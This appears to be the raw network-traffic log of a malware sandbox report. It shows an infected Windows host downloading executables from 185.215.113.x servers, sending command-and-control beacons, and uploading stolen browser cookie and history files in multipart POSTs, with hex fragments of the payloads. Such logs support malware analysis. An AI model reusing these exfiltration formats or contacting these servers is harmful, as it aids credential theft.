Nov 5, 2024 18:46:42.204348087 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:42.204392910 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:42.204405069 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:42.204459906 CET	1236	IN	Data Raw: ec 39 81 3d 81 22 1d 06 fb 79 3d 56 d3 a7 1f 97 9e d5 3c d0 f7 b7 62 b7 68 10 b9 a1 3c 05 33 5f 13 57 7b b2 7a 84 9c e8 4c 22 08 87 f1 e8 a0 af 93 c4 15 10 d1 2f 1a d0 51 0c bb dc 0f 25 33 c8 f0 6a 5f 84 fd 7c de 18 36 99 02 50 b8 69 58 20 f1 a4 Data Ascii: 9="y=V<bh<3_W{zL"/Q%3j_\|6PiX ^4Q}`LbP??H0Y;z3:xb{l6pl"zMH},y=zn8t0;x0d!Y;{(K1''74
Nov 5, 2024 18:46:42.204477072 CET	1236	IN	Data Raw: 93 1a c9 d0 fe 3c 52 a9 ae bd 28 62 17 14 a9 56 1c 98 df 11 ef 28 e8 a9 a7 60 5c b8 de da c7 77 46 e8 e4 e5 a7 f7 f2 3c 35 21 38 3f 77 20 f7 b2 d3 b1 02 82 a7 6a dc 01 f3 0d ff c2 03 ec ec c0 ee 5e a0 b0 e0 ec 24 31 c1 7f e8 3d 76 72 31 46 0a a9 Data Ascii: <R(bV(`\wF<5!8?w j^$1=vr1FvVUlPH~h;1eb8KZYi1.>!:8d8T*@> N0\X- n5_)-w1Up1M'by(P'>"98u4nB
Nov 5, 2024 18:46:42.204488039 CET	1236	IN	Data Raw: d1 0e 21 a0 b6 f8 29 35 95 cb de b6 ee 64 2a 80 ba 0f c5 31 9f 9f 3a ef a6 15 31 5e 8e 4f 5e 1d 7f 08 c9 20 00 a8 38 78 94 66 0d 90 a9 9c bc a8 82 0e 12 89 3e 6e 13 aa 48 8d 37 a9 16 93 23 37 77 41 aa 58 26 6e 2a d2 f6 b3 24 3e f3 60 dc a5 b4 24 Data Ascii: !)5d1:1^O^ 8xf>nH7#7wAX&n$>`$$-Ny?!1Ol~kHPTRk}9=i]nq_qOr<1=]\jnDj$UIthtO^]67"v{WP1!W$
Nov 5, 2024 18:46:42.204497099 CET	1236	IN	Data Raw: 0f a0 b6 7f 3a 5c 6c 19 68 15 89 b9 99 a2 1c 76 b5 1f de f9 0e 15 61 85 c0 3d a9 5b dc 0a 22 91 f7 fe 19 81 ff a5 a4 5a 57 0a 13 b9 08 15 19 8a 32 46 ba c5 e7 52 43 a9 ce 1d 38 ae 5a a8 e8 b2 83 6d 2a e8 f6 ba 31 3e d0 34 83 37 87 15 31 3e 8f d1 Data Ascii: :\lhva=["ZW2FRC8Zm1>471>\1jSnJ [97hOl0f$H=$;1=[^P(0<En#P){6CFn~}$.i~tg$;@
Nov 5, 2024 18:46:42.204507113 CET	36	IN	Data Raw: e6 cf 8f 99 5e 15 03 02 ea af 86 e6 d8 89 78 45 00 dc 1f ea 2b f4 68 f8 3e 8d 29 e2 0e 5d b7 97 7e 47 13 80 Data Ascii: ^xE+h>)]~G
Nov 5, 2024 18:46:42.209181070 CET	1236	IN	Data Raw: 2e 0d 51 b0 de e7 e8 e3 09 5c 49 a8 0a c5 32 ab de e0 d5 43 e9 1c 03 80 02 0f 3f 3a 0f 42 dd 99 e8 f8 30 dd 0c a0 f5 35 63 a6 00 a9 f6 5c b9 f5 2b 50 5a 7a 8e 6e f9 a8 f7 77 7b 0d 1a ec 30 80 76 15 24 20 7a dc b4 b9 7e 8d 29 1a 0f a5 b6 7c 02 c2 Data Ascii: .Q\I2C?:B05c\+PZznw{0v$ z~)\|u9zjp~f"n18`5K.T]d"9bZ$;(z=n>1Q`1;R=$T}9hPA5nH^N]2n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49966	185.215.113.16	80	7788	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:42.284791946 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 5, 2024 18:46:43.190614939 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:43 GMT Content-Type: application/octet-stream Content-Length: 2778112 Last-Modified: Tue, 05 Nov 2024 16:52:45 GMT Connection: keep-alive ETag: "672a4d5d-2a6400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 ff 7f 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ +`Ui` @ @.rsrc`2@.idata 8@lnurvrsx :@bknhvqdr >@.taggant@"B*@
Nov 5, 2024 18:46:43.190635920 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:43.190645933 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:43.190675974 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:43.190690041 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:43.190701008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:43.190711021 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 5, 2024 18:46:43.190812111 CET	1236	IN	Data Raw: a8 7c 7f 1a 80 d9 80 df 08 c8 7e 57 f9 fe db 09 a5 15 e6 f9 65 b3 d2 b9 34 8e b4 d8 ce 13 45 ef 60 00 2b 7e ca f1 05 3a b1 49 bc 0f da b7 70 da 15 8f a0 09 52 82 73 d5 07 b1 7d d3 17 87 37 ec 19 7a 90 19 80 85 8c 31 64 9e 9f cf f5 98 7d 6a 42 61 Data Ascii: \|~We4E`+~:IpRs}7z1d}jBawTp1 r$m}u\|{PwLRYs!t}m7Vo`qZ,uI'zx9q wB1z+4d>@Vz:K=
Nov 5, 2024 18:46:43.190823078 CET	1236	IN	Data Raw: 94 7d 96 2f bc 7d 9a fb a4 68 1f 10 ff a0 94 88 46 a8 90 13 78 b3 b2 f8 35 05 bb 1f 1c c0 8a 1a 46 a8 ca f9 a7 e0 ce 1c ad 73 0c 98 1c 7d d6 19 46 dc 96 47 78 c4 e6 0d 6a 19 f1 53 44 a0 f2 f0 75 a1 2a 74 ff fc 83 a1 1c 00 a3 1a 86 91 0a 68 8e 38 Data Ascii: }/}hFx5Fs}FGxjSDu*th8<Z}"+^$,4S?FNRTS}Zb.jZ&\|5N}Y#/V})TtO!]te\|<Zt#x~
Nov 5, 2024 18:46:43.190833092 CET	1236	IN	Data Raw: 5d 9a 8f 20 72 b8 96 ec 58 e5 46 1a 11 64 86 8e 0b 73 98 47 4c 8d ba c0 00 d6 c5 38 6b 58 ec bd 62 a5 c4 4a 0a f9 b8 de 96 d7 6b ed 25 92 cb b0 56 80 ea 29 fc e3 07 3c 16 70 f4 3b 67 d3 e6 74 8e 8d e2 08 18 d7 da 22 0d 4a 2b 1b 84 2d b0 6b c9 66 Data Ascii: ] rXFdsGL8kXbJk%V)<p;gt"J+-kf1zSOcWD(D{MvW E%AkD j^e45._H8]?_2CkyI,}\ha XrDEg;}?H950
Nov 5, 2024 18:46:43.195926905 CET	1120	IN	Data Raw: 04 c5 5f c4 2e 94 75 f3 29 18 7c de e2 74 b8 fa f9 8d 84 5a fa 94 d6 e7 f6 aa 62 40 fd 85 61 0b fa 84 dc 25 47 91 28 ad 79 59 72 51 5b 43 94 88 45 3e ef 1e 5d e2 9e d7 45 72 88 2e 64 d1 e2 25 f4 df e0 1c 6a d3 d7 c8 c6 9d 81 aa b6 e7 e5 5c 66 58 Data Ascii: _.u)\|tZb@a%G(yYrQ[CE>]Er.d%j\fX{\|%yd"5%57uP4o1+zy ty@dDq{Pi4[0$+}^@:%h"FZ%Mo'<SQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49969	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:42.506848097 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 18:46:43.429605961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49989	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:45.211111069 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 5, 2024 18:46:46.079022884 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50003	185.215.113.206	80	3688	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:47.007431030 CET	629	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCA Host: 185.215.113.206 Content-Length: 427 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------GIJECGDGCBKECAKFBGCA--
Nov 5, 2024 18:46:48.423755884 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:46:48.530710936 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFC Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 18:46:48.530742884 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 45 47 48 4a 45 47 49 44 47 43 41 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 Data Ascii: ------EGDGIEGHJEGIDGCAFBFCContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------EGDGIEGHJEGIDGCAFBFCContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Nov 5, 2024 18:46:49.322438002 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:46:49.525378942 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDBKJKJKKJDGDGDGIDG Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="file"------GHDBKJKJKKJDGDGDGIDG--
Nov 5, 2024 18:46:50.310050011 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:46:51.278578043 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="file"------EHJDGHJDBFIJKECAECAF--
Nov 5, 2024 18:46:52.051306009 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:46:53.711277962 CET	94	OUT	GET /746f34465cf17784/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:53.990108013 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:53 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 5, 2024 18:46:53.990159988 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVE
Nov 5, 2024 18:46:53.990170956 CET	1236	IN	Data Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
Nov 5, 2024 18:46:53.990251064 CET	1236	IN	Data Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 Data Ascii: uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$
Nov 5, 2024 18:46:53.990262032 CET	1236	IN	Data Raw: 89 45 d8 8d 45 dc 89 f9 31 d2 ff 75 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d Data Ascii: EE1uuSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)
Nov 5, 2024 18:46:53.990272045 CET	1236	IN	Data Raw: 8c 00 00 00 8b 55 ac 89 c8 31 db 39 ca 74 3c 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 0f b6 0c 07 30 4c 06 0c 0f b6 0c 07 30 8c 06 8c 00 00 00 0f b6 4c 07 01 30 4c 06 0d 0f b6 4c 07 01 30 8c 06 8d 00 00 00 83 c0 02 39 c2 75 d1 8b 4d f0 31 e9 e8 37 Data Ascii: U19t<f.0L0L0LL09uM17L^_[]USWVh1tlEGGHt1Uuut,tGHjSGW:G
Nov 5, 2024 18:46:53.991044044 CET	848	IN	Data Raw: ff 8b 75 08 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 66 0f 1f 44 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff Data Ascii: ufDT>\>=t%>>f1hM1)^_[]USWV01Eh1E=s hk
